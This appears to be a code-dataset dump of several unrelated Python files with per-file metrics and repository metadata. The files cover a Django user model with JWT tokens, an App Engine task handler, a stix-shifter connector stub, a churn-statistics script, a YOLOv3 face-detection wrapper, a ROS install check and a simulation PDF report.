return f'{self.first_name} {self.last_name}'
@property
def is_active(self):
"""Check if user is active."""
return self.active
@property
def is_staff(self):
"""Check whether user is a staff."""
return self.staff
@property
def is_superuser(self):
"""Check whether user is a super user."""
return self.admin
@property
def token(self):
"""
Get a user's token by calling `user.token`.
"""
return self._generate_jwt_token()
def _generate_jwt_token(self):
"""
Generates a JSON Web Token for access to auth endpoints
"""
dt = datetime.now() + timedelta(days=1)
token = jwt.encode({
'id': self.pk,
'username': self.username,
'email': self.email,
'exp': int(dt.strftime('%s'))
}, settings.SECRET_KEY, algorithm='HS256')
return token.decode('utf-8')
def get_full_name(self):
return ('%s %s') % (self.first_name, self.last_name)
def get_short_name(self):
return self.username
def has_perm(self, perm, obj=None):
return self.admin
| 29.35
| 78
| 0.635775
| 2,549
| 0.868484
| 0
| 0
| 465
| 0.158433
| 0
| 0
| 603
| 0.205451
|
af89871525ce046c30aacd0f640b5f99e4205cd0
| 2,254
|
py
|
Python
|
deferred/handler.py
|
potatolondon/djangoappengine-1-4
|
ae4993597f5afcfa0df42f0fa50913f4c85e2b74
|
[
"BSD-3-Clause"
] | null | null | null |
deferred/handler.py
|
potatolondon/djangoappengine-1-4
|
ae4993597f5afcfa0df42f0fa50913f4c85e2b74
|
[
"BSD-3-Clause"
] | null | null | null |
deferred/handler.py
|
potatolondon/djangoappengine-1-4
|
ae4993597f5afcfa0df42f0fa50913f4c85e2b74
|
[
"BSD-3-Clause"
] | null | null | null |
# Initialize Django.
from djangoappengine import main
from django.utils.importlib import import_module
from django.conf import settings
# Load all models.py to ensure signal handling installation or index
# loading of some apps
for app in settings.INSTALLED_APPS:
try:
import_module('%s.models' % (app))
except ImportError:
pass
# The maximum retry count on the original task queue. After that the task is reenqued on the broken-tasks queue
MAX_RETRY_COUNT = getattr(settings, 'TASK_RETRY_ON_SOURCE_QUEUE', None)
BROKEN_TASK_QUEUE = getattr(settings, 'BROKEN_TASK_QUEUE', 'broken-tasks')
import logging
from google.appengine.api import taskqueue
from google.appengine.ext.webapp import WSGIApplication
from google.appengine.ext.webapp.util import run_wsgi_app
from google.appengine.ext.deferred import deferred
class LimitedTaskHandler(deferred.TaskHandler):
def post(self):
try:
self.run_from_request()
except deferred.SingularTaskFailure:
logging.debug("Failure executing task, task retry forced")
self.response.set_status(408)
except deferred.PermanentTaskFailure:
logging.exception("Permanent failure attempting to execute task")
except Exception, exception:
logging.exception(exception)
retries = int(self.request.headers['X-AppEngine-TaskExecutioncount'])
already_broken = self.request.headers['X-AppEngine-Queuename'] == BROKEN_TASK_QUEUE
if already_broken or MAX_RETRY_COUNT is None or retries < MAX_RETRY_COUNT:
# Failing normally
self.error(500)
else:
logging.info("Retrying this task on the broken-tasks queue from now on")
# Reinserting task onto the brokentask queue
task = taskqueue.Task(
payload=self.request.body,
countdown=2.0,
url=deferred._DEFAULT_URL,
headers=deferred._TASKQUEUE_HEADERS
)
task.add(BROKEN_TASK_QUEUE)
application = WSGIApplication([(".*", LimitedTaskHandler)])
def main():
run_wsgi_app(application)
if __name__ == "__main__":
main()
| 33.641791
| 111
| 0.676575
| 1,265
| 0.561224
| 0
| 0
| 0
| 0
| 0
| 0
| 571
| 0.253327
|
af8999488b4c74fa92580fccfbc64a7e842f0087
| 260
|
py
|
Python
|
stix_shifter/stix_transmission/src/modules/cloudIdentity/cloudIdentity_results_connector.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/cloudIdentity_results_connector.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | null | null | null |
stix_shifter/stix_transmission/src/modules/cloudIdentity/cloudIdentity_results_connector.py
|
cookna/stix-shifter
|
3152f24cf7acb7670454433525ec10030102e146
|
[
"Apache-2.0"
] | 2
|
2019-06-26T19:23:52.000Z
|
2019-07-09T15:33:16.000Z
|
from ..base.base_results_connector import BaseResultsConnector
import json
from .....utils.error_response import ErrorResponder
class CloudIdentityResultsConnector(BaseQueryConnector):
def __init__(self, api_client):
self.api_client = api_client
| 28.888889
| 62
| 0.807692
| 129
| 0.496154
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
af8a181071e7abdcc867b84eb6bf5ea64085f25a
| 717
|
py
|
Python
|
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
churnalyze/py/churn_stats.py
|
Rdeandres/fight-churn
|
88fbff9b00f5ec4a9622073db15ab8809dfb21b3
|
[
"MIT"
] | null | null | null |
import sys
from churn_calc import ChurnCalculator
def main():
'''
Creates churn calculator and runs the statistics and correlation functions.
The schema name is taken from the first command line argument.
The dataset and all other parameters are then taken from the schema configuration.
:return: None
'''
schema = 'churnsim2'
if len(sys.argv) >= 2:
schema = sys.argv[1]
dataset = None
if len(sys.argv) >= 3:
dataset = sys.argv[2]
churn_calc = ChurnCalculator(schema,dataset)
churn_calc.dataset_stats(save=True)
churn_calc.dataset_corr(save=True)
churn_calc.dataset_corr(save=True,use_scores=False)
if __name__ == "__main__":
main()
| 23.9
| 86
| 0.687587
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 284
| 0.396095
|
af8b4f7cdd96f1e05ccc0b6456d5fe449a767019
| 2,888
|
py
|
Python
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 25
|
2020-11-20T09:01:35.000Z
|
2022-03-29T10:35:38.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 5
|
2021-02-28T20:49:37.000Z
|
2022-03-04T21:50:27.000Z
|
python/contrib/head_pose_picture/src/yolov3/yolov3.py
|
coldenheart/123
|
798768bba7dfaef051a46d8e1df48bc671de5213
|
[
"Apache-2.0"
] | 16
|
2020-12-06T07:26:13.000Z
|
2022-03-01T07:51:55.000Z
|
"""Licensed under the Apache License, Version 2.0 (the "License");
you may not use this file except in compliance with the License.
You may obtain a copy of the License at
http://www.apache.org/licenses/LICENSE-2.0
Unless required by applicable law or agreed to in writing, software
distributed under the License is distributed on an "AS IS" BASIS,
WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
See the License for the specific language governing permissions and
limitations under the License."""
import yolov3.yolov3_postprocessing as postprocessing
import numpy as np
import cv2
import os
class YOLOV3(object):
"""YOLOv3"""
def __init__(self, camera_height, camera_width, yolo_model):
# load YOLO model
self.yolo_v3 = yolo_model
# parameters for preprocessing
self.ih, self.iw = (camera_height, camera_width)
self.h, self.w = (416, 416)
self.scale = min(self.w / self.iw, self.h / self.ih)
self.nw = int(self.iw * self.scale)
self.nh = int(self.ih * self.scale)
# parameters for postprocessing
self.image_shape = [camera_height, camera_width]
self.model_shape = [self.h, self.w]
self.num_classes = 1
self.anchors = self.get_anchors()
def get_anchors(self):
"""return anchors
Returns:
[ndarray]: anchors array
"""
SRC_PATH = os.path.realpath(__file__).rsplit("/", 1)[0]
anchors_path = os.path.join(SRC_PATH, './yolo_anchors.txt')
with open(anchors_path) as f:
anchors = f.readline()
anchors = [float(x) for x in anchors.split(',')]
return np.array(anchors).reshape(-1, 2)
def inference(self, img):
"""Run YOLOv3 for face detection
Args:
img ([ndarray]): image (416, 416, 3)
"""
# preprocessing: resize and paste input image to a new image with size 416*416
img = np.array(img, dtype='float32')
img_resize = cv2.resize(img, (self.nw, self.nh),
interpolation=cv2.INTER_CUBIC)
img_new = np.ones((416, 416, 3), np.float32) * 128
img_new[(self.h - self.nh) // 2: ((self.h - self.nh) // 2 + self.nh),
(self.w - self.nw) // 2: (self.w - self.nw) // 2 + self.nw, :] = img_resize[:, :, :]
img_new = img_new / 255.
# inference
resultList = self.yolo_v3.execute([img_new])
out_list = [resultList[0], resultList[1], resultList[2]]
# convert yolo output to box axis and score
box_axis, box_score = postprocessing.yolo_eval(
out_list, self.anchors, self.num_classes, self.image_shape)
# get the crop image and corresponding width/heigh info for WHENet
nparryList, boxList = postprocessing.get_box_img(img, box_axis)
return nparryList, boxList
| 39.027027
| 100
| 0.630194
| 2,260
| 0.782548
| 0
| 0
| 0
| 0
| 0
| 0
| 1,044
| 0.361496
|
af8b6e0be67a25ec631893c23bc76d3128fe5bc9
| 901
|
py
|
Python
|
rigid_body_motion/ros/check_install.py
|
phausamann/rigid-body-motion
|
2d4fbb1b949cc0b609a59877d7539af75dad6861
|
[
"MIT"
] | 8
|
2021-05-20T02:24:07.000Z
|
2022-03-05T17:15:11.000Z
|
rigid_body_motion/ros/check_install.py
|
phausamann/rigid-body-motion
|
2d4fbb1b949cc0b609a59877d7539af75dad6861
|
[
"MIT"
] | 10
|
2019-06-13T09:36:15.000Z
|
2022-01-17T16:55:05.000Z
|
rigid_body_motion/ros/check_install.py
|
phausamann/rigid-body-motion
|
2d4fbb1b949cc0b609a59877d7539af75dad6861
|
[
"MIT"
] | 1
|
2021-08-13T10:24:31.000Z
|
2021-08-13T10:24:31.000Z
|
import traceback
if __name__ == "__main__":
try:
import geometry_msgs.msg # noqa
import rospy # noqa
import std_msgs.msg # noqa
import visualization_msgs.msg # noqa
try:
import rospkg # noqa
import tf2_geometry_msgs # noqa
import tf2_ros # noqa
from tf.msg import tfMessage # noqa
except rospkg.ResourceNotFound:
raise ImportError(
"The rospkg module was found but tf2_ros failed to import, "
"make sure you've set up the necessary environment variables"
)
except ImportError:
print(
f"Some dependencies are not correctly installed. "
f"See the traceback below for more info.\n\n"
f"{traceback.format_exc()}"
)
else:
print("All dependencies correctly installed!")
| 29.064516
| 77
| 0.577137
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 340
| 0.377358
|
af8d86b547c3138c87e5922ed826526a715c832e
| 3,466
|
py
|
Python
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 155
|
2016-11-23T12:52:16.000Z
|
2022-03-31T15:35:44.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 590
|
2016-12-10T11:31:18.000Z
|
2022-03-30T23:10:09.000Z
|
rstbx/simulation/sim_pdf.py
|
dperl-sol/cctbx_project
|
b9e390221a2bc4fd00b9122e97c3b79c632c6664
|
[
"BSD-3-Clause-LBNL"
] | 115
|
2016-11-15T08:17:28.000Z
|
2022-02-09T15:30:14.000Z
|
from __future__ import absolute_import, division, print_function
from six.moves import range
from scitbx.array_family import flex
page_origin = (20.,220.)
boxedge = 500.
class PointTransform:
'''provide the necessary transformation to go from image pixel coordinates
to coordinates on the printed page of the .pdf report'''
def __init__(self,detector_edge):
self.boxedge = boxedge
self.page_origin = page_origin
self.size1 = detector_edge
self.size2 = detector_edge
self.subwindow_origin=[0.,0.]
self.subwindow_fraction=1.
def toPage(self, image_pixel_xy):
image_fractional_coords = ((1.-image_pixel_xy[0]/self.size1),
image_pixel_xy[1]/self.size2)
image_subwindow_coords = ((image_fractional_coords[1]-self.subwindow_origin[1])/
self.subwindow_fraction,
(image_fractional_coords[0]-self.subwindow_origin[0])/
self.subwindow_fraction)
if 0.<image_subwindow_coords[0]<1. and 0.<image_subwindow_coords[1]<1.:
page_coords = (image_subwindow_coords[0]*self.boxedge + self.page_origin[0],
(1.-image_subwindow_coords[1])*self.boxedge + self.page_origin[1]
)
return page_coords
return None
from reportlab.pdfgen.canvas import Canvas
from reportlab.lib.pagesizes import letter
from reportlab.lib.units import cm,mm
class Graph:
def __init__(self,fileout):
self.c = Canvas(fileout,pagesize=letter)
def title(self,text):
print(text)
lines = text.split('\n')
self.c.setFont('Helvetica',12)
self.c.drawString(2*cm,26*cm,lines[0])
if len(lines)>1:
self.c.drawString(2*cm,25.5*cm,lines[1])
def setTransform(self,detector_edge):
#given the raw image fractional coordinates of the subwindow origin
self.T = PointTransform(detector_edge)
def __del__(self):
self.c.save()
class PDF:
def __init__(self,filename):
self.R = Graph(filename)
def make_image_plots_detail(self,ray_sim):
normal = ray_sim.sim.tracing_impacts
self.R.setTransform(ray_sim.detector.raw.focus()[0])
self.R.title(
"%.3f bandpass + %.3f degrees mosaicity (full widths); perfect optics"%(
ray_sim.sim.bandpass,
ray_sim.sim.mosaicity)+
"\nEnergy %4.1f KeV; Detector distance %6.1f mm; Limiting resolution %6.2f Angstrom"%(
(12.398/(ray_sim.camera.lambda0*1E10)),
ray_sim.camera.distance*1000.,
ray_sim.structure.limiting_resolution))
data_array = 255-ray_sim.image
import numpy
try:
import PIL.Image as Image
except ImportError:
import Image
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1
)
self.R.c.drawInlineImage(imageout,x=2*cm,y=9*cm, width=15*cm, height=15*cm)
self.R.c.showPage()
return self
if __name__=="__main__":
data_array = flex.double(flex.grid((768,768)),1.0)
print(data_array.focus())
data_array = flex.double(flex.grid((7,7)),255)
for x in range(7):
data_array[(3,x)] = 0.
data_array[(x,3)] = 0.
try:
import PIL.Image as Image
except ImportError:
import Image
import numpy
args = ("L",0,1)
imageout = Image.frombuffer("L",data_array.focus(),
data_array.as_float().as_numpy_array().astype(numpy.uint8).tostring(),
"raw","L",0,1)
imageout.save("newfile.png","PNG")
| 31.798165
| 89
| 0.671091
| 2,621
| 0.756203
| 0
| 0
| 0
| 0
| 0
| 0
| 428
| 0.123485
|